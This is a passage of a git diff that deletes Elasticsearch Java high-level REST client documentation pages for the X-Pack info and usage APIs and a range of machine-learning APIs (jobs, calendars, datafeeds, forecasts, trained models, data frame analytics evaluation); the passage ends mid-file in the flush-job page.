- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[x-pack-info-response] --------------------------------------------------- -<1> `BuildInfo` contains the commit hash from which Elasticsearch was -built and the timestamp that the x-pack module was created. -<2> `LicenseInfo` contains the type of license that the cluster is using -and its expiration date. -<3> Basic licenses do not expire and will return this constant. -<4> `FeatureSetsInfo` contains a `Map` from the name of a feature to -information about a feature like whether or not it is available under -the current license. - -[[java-rest-high-x-pack-info-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[x-pack-info-execute-async] --------------------------------------------------- -<1> The `XPackInfoRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `XPackInfoResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[x-pack-info-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/miscellaneous/x-pack-usage.asciidoc b/docs/java-rest/high-level/miscellaneous/x-pack-usage.asciidoc deleted file mode 100644 index c1e5ccf13e2..00000000000 --- a/docs/java-rest/high-level/miscellaneous/x-pack-usage.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[[java-rest-high-x-pack-usage]] -=== X-Pack Usage API - -[[java-rest-high-x-pack-usage-execution]] -==== Execution - -Detailed information about the usage of features from {xpack} can be -retrieved using the `usage()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[x-pack-usage-execute] --------------------------------------------------- - -[[java-rest-high-x-pack-usage-response]] -==== Response - -The returned `XPackUsageResponse` contains a `Map` keyed by feature name. -Every feature map has an `available` key, indicating whether that -feature is available given the current license, and an `enabled` key, -indicating whether that feature is currently enabled. Other keys -are specific to each feature. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[x-pack-usage-response] --------------------------------------------------- - -[[java-rest-high-x-pack-usage-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[x-pack-usage-execute-async] --------------------------------------------------- -<1> The call to execute the usage api and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `XPackUsageResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[x-pack-usage-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/ml/close-job.asciidoc b/docs/java-rest/high-level/ml/close-job.asciidoc deleted file mode 100644 index 83798b591c2..00000000000 --- a/docs/java-rest/high-level/ml/close-job.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ --- -:api: close-job -:request: CloseJobRequest -:response: CloseJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Close {anomaly-jobs} API - -Closes {anomaly-jobs} in the cluster. It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Close {anomaly-jobs} request - -A +{request}+ object gets created with an existing non-null `jobId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing existing job IDs -<2> Optionally used to close a failed job, or to forcefully close a job -which has not responded to its initial close request. -<3> Optionally set to ignore if a wildcard expression matches no jobs. - (This includes `_all` string or when no jobs have been specified) -<4> Optionally setting the `timeout` value for how long the -execution should wait for the job to be closed. - -[id="{upid}-{api}-response"] -==== Close {anomaly-jobs} response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `isClosed()` from the +{response}+ indicates if the job was successfully -closed or not. 
-
-include::../execution.asciidoc[]
diff --git a/docs/java-rest/high-level/ml/delete-calendar-event.asciidoc b/docs/java-rest/high-level/ml/delete-calendar-event.asciidoc
deleted file mode 100644
index e5879726457..00000000000
--- a/docs/java-rest/high-level/ml/delete-calendar-event.asciidoc
+++ /dev/null
@@ -1,38 +0,0 @@
---
-:api: delete-calendar-event
-:request: DeleteCalendarEventRequest
-:response: AcknowledgedResponse
---
-[role="xpack"]
-[id="{upid}-{api}"]
-=== Delete calendar events API
-
-Removes a scheduled event from an existing {ml} calendar.
-The API accepts a +{request}+ and responds
-with a +{response}+ object.
-
-[id="{upid}-{api}-request"]
-==== Delete calendar events request
-
-A +{request}+ is constructed referencing a non-null
-calendar ID and the ID of the event to remove from the calendar:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
--------------------------------------------------
-<1> The ID of the calendar from which to remove the event
-<2> The ID of the event to remove from the calendar
-
-[id="{upid}-{api}-response"]
-==== Delete calendar events response
-
-The returned +{response}+ acknowledges the success of the request:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response]
--------------------------------------------------
-<1> Acknowledgement of the request and its success
-
-include::../execution.asciidoc[]
diff --git a/docs/java-rest/high-level/ml/delete-calendar-job.asciidoc b/docs/java-rest/high-level/ml/delete-calendar-job.asciidoc
deleted file mode 100644
index cbfd2f40a8b..00000000000
--- a/docs/java-rest/high-level/ml/delete-calendar-job.asciidoc
+++ /dev/null
@@ -1,38 +0,0 @@
---
-:api: delete-calendar-job
-:request: DeleteCalendarJobRequest
-:response: PutCalendarResponse
---
-[role="xpack"]
-[id="{upid}-{api}"]
-=== Delete {anomaly-jobs} from calendar API
-
-Removes {anomaly-jobs} from an existing {ml} calendar.
-The API accepts a +{request}+ and responds
-with a +{response}+ object.
- -[id="{upid}-{api}-request"] -==== Delete {anomaly-jobs} from calendar request - -A +{request}+ is constructed referencing a non-null -calendar ID, and JobIDs which to remove from the calendar - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The ID of the calendar from which to remove the jobs -<2> The JobIds to remove from the calendar - -[id="{upid}-{api}-response"] -==== Delete {anomaly-jobs} from calendar response - -The returned +{response}+ contains the updated Calendar: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The updated calendar with the jobs removed - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/delete-calendar.asciidoc b/docs/java-rest/high-level/ml/delete-calendar.asciidoc deleted file mode 100644 index 1c35164ad57..00000000000 --- a/docs/java-rest/high-level/ml/delete-calendar.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: delete-calendar -:request: DeleteCalendarRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete calendars API - -Deletes a {ml} calendar. -The API accepts a +{request}+ and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Delete calendars request - -A `DeleteCalendar` object requires a non-null `calendarId`. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new request referencing an existing calendar - -[id="{upid}-{api}-response"] -==== Delete calendars response - -The returned +{response}+ object indicates the acknowledgement of the request: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] ---------------------------------------------------- -<1> `isAcknowledged` was the deletion request acknowledged or not - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/delete-data-frame-analytics.asciidoc b/docs/java-rest/high-level/ml/delete-data-frame-analytics.asciidoc deleted file mode 100644 index 4967d137894..00000000000 --- a/docs/java-rest/high-level/ml/delete-data-frame-analytics.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ --- -:api: delete-data-frame-analytics -:request: DeleteDataFrameAnalyticsRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete {dfanalytics-jobs} API - -experimental::[] - -Delete an existing {dfanalytics-job}. -The API accepts a +{request}+ object as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Delete {dfanalytics-jobs} request - -A +{request}+ object requires a {dfanalytics-job} ID. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new request referencing an existing {dfanalytics-job}. 
- -==== Optional arguments - -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] ---------------------------------------------------- -<1> Use to forcefully delete a job that is not stopped. This method is quicker than stopping -and deleting the job. Defaults to `false`. -<2> Use to set the time to wait until the job is deleted. Defaults to 1 minute. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ object acknowledges the {dfanalytics-job} deletion. diff --git a/docs/java-rest/high-level/ml/delete-datafeed.asciidoc b/docs/java-rest/high-level/ml/delete-datafeed.asciidoc deleted file mode 100644 index d2b81d1e8b7..00000000000 --- a/docs/java-rest/high-level/ml/delete-datafeed.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ --- -:api: delete-datafeed -:request: DeleteDatafeedRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-delete-datafeed"] -=== Delete datafeeds API - -Deletes an existing datafeed. - -[id="{upid}-{api}-request"] -==== Delete datafeeds request - -A +{request}+ object requires a non-null `datafeedId` and can optionally set `force`. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Use to forcefully delete a started datafeed. This method is quicker than -stopping and deleting the datafeed. Defaults to `false`. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Delete datafeeds response - -The returned +{response}+ object indicates the acknowledgement of the request: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] ---------------------------------------------------- -<1> `isAcknowledged` was the deletion request acknowledged or not. diff --git a/docs/java-rest/high-level/ml/delete-expired-data.asciidoc b/docs/java-rest/high-level/ml/delete-expired-data.asciidoc deleted file mode 100644 index b86cc3723e2..00000000000 --- a/docs/java-rest/high-level/ml/delete-expired-data.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ - --- -:api: delete-expired-data -:request: DeleteExpiredRequest -:response: DeleteExpiredResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete expired data API - -Deletes expired {ml} data. -The API accepts a +{request}+ and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Delete expired data request - -A `DeleteExpiredDataRequest` object does not require any arguments. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new request. -<2> Optionally set a job ID. Use `null` for the default wild card all `*`. -<3> Providing requests per second throttling for the - deletion processes. Default is no throttling. -<4> Setting how long the deletion processes will be allowed - to run before they are canceled. Default value is `8h` (8 hours). 
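-
-Putting the pieces above together, a minimal hand-written sketch could look as follows.
-It is illustrative only: it assumes the class names `DeleteExpiredDataRequest` and
-`DeleteExpiredDataResponse` used in the prose above, the `deleteExpiredData()` method name,
-and a 7.x-style client whose execution methods accept `RequestOptions`.
-
-[source,java]
--------------------------------------------------
-DeleteExpiredDataRequest deleteExpiredDataRequest = new DeleteExpiredDataRequest(); // <1>
-
-DeleteExpiredDataResponse deleteExpiredDataResponse =
-        client.machineLearning().deleteExpiredData(deleteExpiredDataRequest, RequestOptions.DEFAULT); // <2>
--------------------------------------------------
-<1> No arguments are required; expired data is removed for all jobs by default
-<2> Execute the request (the method name is an assumption based on the API name)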
- -[id="{upid}-{api}-response"] -==== Delete expired data response - -The returned +{response}+ object indicates the acknowledgement of the request: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] ---------------------------------------------------- -<1> `getDeleted` acknowledges the deletion request. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/delete-filter.asciidoc b/docs/java-rest/high-level/ml/delete-filter.asciidoc deleted file mode 100644 index 29659f8a51e..00000000000 --- a/docs/java-rest/high-level/ml/delete-filter.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: delete-filter -:request: DeleteFilterRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete filters API - -Deletes a {ml} filter. -The API accepts a +{request}+ and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Delete filters request - -A +{request}+ object requires a non-null `filterId`. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new request referencing an existing filter - -[id="{upid}-{api}-response"] -==== Delete filters response - -The returned +{response}+ object indicates the acknowledgement of the request: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] ---------------------------------------------------- -<1> `isAcknowledged` was the deletion request acknowledged or not - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/delete-forecast.asciidoc b/docs/java-rest/high-level/ml/delete-forecast.asciidoc deleted file mode 100644 index 49996752024..00000000000 --- a/docs/java-rest/high-level/ml/delete-forecast.asciidoc +++ /dev/null @@ -1,51 +0,0 @@ --- -:api: delete-forecast -:request: DeleteForecastRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete forecasts API - -Deletes forecasts from an {anomaly-job}. -It accepts a +{request}+ object and responds -with an +{response}+ object. - -[id="{upid}-{api}-request"] -==== Delete forecasts request - -A +{request}+ object gets created with an existing non-null `jobId`. -All other fields are optional for the request. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId` - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> Sets the specific forecastIds to delete, can be set to `_all` to indicate ALL forecasts for the given -`jobId` -<2> Set the timeout for the request to respond, default is 30 seconds -<3> Set the `allow_no_forecasts` option. When `true` no error will be returned if an `_all` -request finds no forecasts. 
It defaults to `true` - -[id="{upid}-{api}-response"] -==== Delete forecasts response - -An +{response}+ contains an acknowledgement of the forecast(s) deletion - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `isAcknowledged()` indicates if the forecast was successfully deleted or not. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/delete-job.asciidoc b/docs/java-rest/high-level/ml/delete-job.asciidoc deleted file mode 100644 index ad4c147c491..00000000000 --- a/docs/java-rest/high-level/ml/delete-job.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ --- -:api: delete-job -:request: DeleteJobRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete {anomaly-jobs} API - -Deletes an {anomaly-job} that exists in the cluster. - -[id="{upid}-{api}-request"] -==== Delete {anomaly-jobs} request - -A +{request}+ object requires a non-null `jobId` and can optionally set `force`. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId` - -==== Optional arguments - -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-force] ---------------------------------------------------- -<1> Use to forcefully delete an opened job. This method is quicker than closing -and deleting the job. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-wait-for-completion] ---------------------------------------------------- -<1> Use to set whether the request should wait until the operation has completed -before returning. Defaults to `true`. - - -[id="{upid}-{api}-response"] -==== Delete {anomaly-jobs} response - -The returned +{response}+ object indicates the acknowledgement of the job -deletion or the deletion task depending on whether the request was set to wait -for completion: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] ---------------------------------------------------- -<1> Whether job deletion was acknowledged or not. It will be `null` when set -to not wait for completion. -<2> The ID of the job deletion task. It will be `null` when set to wait for -completion. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/delete-model-snapshot.asciidoc b/docs/java-rest/high-level/ml/delete-model-snapshot.asciidoc deleted file mode 100644 index a1ad2884bdf..00000000000 --- a/docs/java-rest/high-level/ml/delete-model-snapshot.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ --- -:api: delete-model-snapshot -:request: DeleteModelSnapshotRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete model snapshots API - -Deletes an existing model snapshot. - -[id="{upid}-{api}-request"] -==== Delete model snapshots request - -A +{request}+ object requires both a non-null `jobId` and a non-null `snapshotId`. 
- -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new request referencing existing `jobId` and `snapshotId`. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Delete model snapshots response - -The returned +{response}+ object indicates the acknowledgement of the request: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] ---------------------------------------------------- -<1> `isAcknowledged` was the deletion request acknowledged or not diff --git a/docs/java-rest/high-level/ml/delete-trained-models.asciidoc b/docs/java-rest/high-level/ml/delete-trained-models.asciidoc deleted file mode 100644 index f906e71f1b6..00000000000 --- a/docs/java-rest/high-level/ml/delete-trained-models.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: delete-trained-models -:request: DeleteTrainedModelRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete trained models API - -experimental::[] - -Deletes a previously saved trained model. -The API accepts a +{request}+ object and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Delete trained models request - -A +{request}+ requires a valid trained model ID. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new DELETE request referencing an existing trained model - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ object acknowledges the trained model deletion. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/ml/estimate-model-memory.asciidoc b/docs/java-rest/high-level/ml/estimate-model-memory.asciidoc deleted file mode 100644 index 8e8b5f1befa..00000000000 --- a/docs/java-rest/high-level/ml/estimate-model-memory.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ --- -:api: estimate-model-memory -:request: EstimateModelMemoryRequest -:response: EstimateModelMemoryResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Estimate {anomaly-job} model memory API - -Estimate the model memory an analysis config is likely to need for -the given cardinality of the fields it references. - -[id="{upid}-{api}-request"] -==== Estimate {anomaly-job} model memory request - -A +{request}+ can be set up as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Pass an `AnalysisConfig` to the constructor. -<2> For any `by_field_name`, `over_field_name` or - `partition_field_name` fields referenced by the - detectors, supply overall cardinality estimates - in a `Map`. -<3> For any `influencers`, supply a `Map` containing - estimates of the highest cardinality expected in - any single bucket. 
- -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Estimate {anomaly-job} model memory response - -The returned +{response}+ contains the model memory estimate: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The model memory estimate. diff --git a/docs/java-rest/high-level/ml/evaluate-data-frame.asciidoc b/docs/java-rest/high-level/ml/evaluate-data-frame.asciidoc deleted file mode 100644 index 70485d30cf2..00000000000 --- a/docs/java-rest/high-level/ml/evaluate-data-frame.asciidoc +++ /dev/null @@ -1,139 +0,0 @@ --- -:api: evaluate-data-frame -:request: EvaluateDataFrameRequest -:response: EvaluateDataFrameResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Evaluate {dfanalytics} API - -experimental::[] - -Evaluates the {dfanalytics} for an annotated index. -The API accepts an +{request}+ object and returns an +{response}+. - -[id="{upid}-{api}-request"] -==== Evaluate {dfanalytics} request - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new evaluation request -<2> Reference to an existing index -<3> The query with which to select data from indices -<4> Evaluation to be performed - -==== Evaluation - -Evaluation to be performed. -Currently, supported evaluations include: +OutlierDetection+, +Classification+, +Regression+. - -===== Outlier detection - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-evaluation-outlierdetection] --------------------------------------------------- -<1> Constructing a new evaluation -<2> Name of the field in the index. Its value denotes the actual (i.e. ground truth) label for an example. Must be either true or false. -<3> Name of the field in the index. Its value denotes the probability (as per some ML algorithm) of the example being classified as positive. -<4> The remaining parameters are the metrics to be calculated based on the two fields described above -<5> {wikipedia}/Precision_and_recall#Precision[Precision] calculated at thresholds: 0.4, 0.5 and 0.6 -<6> {wikipedia}/Precision_and_recall#Recall[Recall] calculated at thresholds: 0.5 and 0.7 -<7> {wikipedia}/Confusion_matrix[Confusion matrix] calculated at threshold 0.5 -<8> {wikipedia}/Receiver_operating_characteristic#Area_under_the_curve[AuC ROC] calculated and the curve points returned - -===== Classification - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-evaluation-classification] --------------------------------------------------- -<1> Constructing a new evaluation -<2> Name of the field in the index. Its value denotes the actual (i.e. ground truth) class the example belongs to. -<3> Name of the field in the index. Its value denotes the predicted (as per some ML algorithm) class of the example. -<4> Name of the field in the index. Its value denotes the array of top classes. Must be nested. 
-<5> The remaining parameters are the metrics to be calculated based on the two fields described above -<6> Accuracy -<7> Precision -<8> Recall -<9> Multiclass confusion matrix of size 3 -<10> {wikipedia}/Receiver_operating_characteristic#Area_under_the_curve[AuC ROC] calculated for class "cat" treated as positive and the rest as negative - -===== Regression - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-evaluation-regression] --------------------------------------------------- -<1> Constructing a new evaluation -<2> Name of the field in the index. Its value denotes the actual (i.e. ground truth) value for an example. -<3> Name of the field in the index. Its value denotes the predicted (as per some ML algorithm) value for the example. -<4> The remaining parameters are the metrics to be calculated based on the two fields described above -<5> {wikipedia}/Mean_squared_error[Mean squared error] -<6> Mean squared logarithmic error -<7> {wikipedia}/Huber_loss#Pseudo-Huber_loss_function[Pseudo Huber loss] -<8> {wikipedia}/Coefficient_of_determination[R squared] - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the requested evaluation metrics. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Fetching all the calculated metrics results - -==== Results - -===== Outlier detection - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-results-outlierdetection] --------------------------------------------------- - -<1> Fetching precision metric by name -<2> Fetching precision at a given (0.4) threshold -<3> Fetching confusion matrix metric by name -<4> Fetching confusion matrix at a given (0.5) threshold - -===== Classification - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-results-classification] --------------------------------------------------- - -<1> Fetching accuracy metric by name -<2> Fetching the actual accuracy value -<3> Fetching precision metric by name -<4> Fetching the actual precision value -<5> Fetching recall metric by name -<6> Fetching the actual recall value -<7> Fetching multiclass confusion matrix metric by name -<8> Fetching the contents of the confusion matrix -<9> Fetching the number of classes that were not included in the matrix -<10> Fetching AucRoc metric by name -<11> Fetching the actual AucRoc score - -===== Regression - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-results-regression] --------------------------------------------------- - -<1> Fetching mean squared error metric by name -<2> Fetching the actual mean squared error value -<3> Fetching mean squared logarithmic error metric by name -<4> Fetching the actual mean squared logarithmic error value -<5> Fetching pseudo Huber loss metric by name -<6> Fetching the actual pseudo Huber loss value -<7> Fetching R squared metric by name -<8> Fetching the actual R squared value diff --git a/docs/java-rest/high-level/ml/explain-data-frame-analytics.asciidoc 
b/docs/java-rest/high-level/ml/explain-data-frame-analytics.asciidoc deleted file mode 100644 index 7d9ac1620ec..00000000000 --- a/docs/java-rest/high-level/ml/explain-data-frame-analytics.asciidoc +++ /dev/null @@ -1,50 +0,0 @@ --- -:api: explain-data-frame-analytics -:request: ExplainDataFrameAnalyticsRequest -:response: ExplainDataFrameAnalyticsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Explain {dfanalytics} API - -experimental::[] - -Explains the following about a {dataframe-analytics-config}: - -* field selection: which fields are included or not in the analysis -* memory estimation: how much memory is estimated to be required. The estimate can be used when deciding the appropriate value for `model_memory_limit` setting later on. - -The API accepts an +{request}+ object and returns an +{response}+. - -[id="{upid}-{api}-request"] -==== Explain {dfanalytics} request - -The request can be constructed with the id of an existing {dfanalytics-job}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-id-request] --------------------------------------------------- -<1> Constructing a new request with the id of an existing {dfanalytics-job} - -It can also be constructed with a {dataframe-analytics-config} to explain it before creating it. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-request] --------------------------------------------------- -<1> Constructing a new request containing a {dataframe-analytics-config} - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the field selection and the memory usage estimation. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> A list where each item explains whether a field was selected for analysis or not -<2> The memory estimation for the {dfanalytics-job} diff --git a/docs/java-rest/high-level/ml/find-file-structure.asciidoc b/docs/java-rest/high-level/ml/find-file-structure.asciidoc deleted file mode 100644 index 8d73791ad19..00000000000 --- a/docs/java-rest/high-level/ml/find-file-structure.asciidoc +++ /dev/null @@ -1,55 +0,0 @@ --- -:api: find-file-structure -:request: FindFileStructureRequest -:response: FindFileStructureResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Find file structure API - -experimental::[] - -Determines the structure of a text file and other information that will be -useful to import its contents to an {es} index. It accepts a +{request}+ object -and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Find file structure request - -A sample from the beginning of the file (or the entire file contents if -it's small) must be added to the +{request}+ object using the -`FindFileStructureRequest#setSample` method. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Create a new `FindFileStructureRequest` object -<2> Add the contents of `anInterestingFile` to the request - -==== Optional arguments - -The following arguments are optional. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> Set the maximum number of lines to sample (the entire sample will be - used if it contains fewer lines) -<2> Request that an explanation of the analysis be returned in the response - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Find file structure response - -A +{response}+ contains information about the file structure, -as well as mappings and an ingest pipeline that could be used -to index the contents into {es}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The `FileStructure` object contains the structure information diff --git a/docs/java-rest/high-level/ml/flush-job.asciidoc b/docs/java-rest/high-level/ml/flush-job.asciidoc deleted file mode 100644 index cc2dd11268c..00000000000 --- a/docs/java-rest/high-level/ml/flush-job.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ --- -:api: flush-job -:request: FlushJobRequest -:response: FlushJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Flush jobs API - -Flushes an anomaly detection job's datafeed in the cluster. -It accepts a +{request}+ object and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Flush jobs request - -A +{request}+ object gets created with an existing non-null `jobId`. -All other fields are optional for the request. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId` - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> Set request to calculate the interim results -<2> Set the advanced time to flush to the particular time value -<3> Set the start time for the range of buckets on which -to calculate the interim results (requires `calc_interim` to be `true`) -<4> Set the end time for the range of buckets on which -to 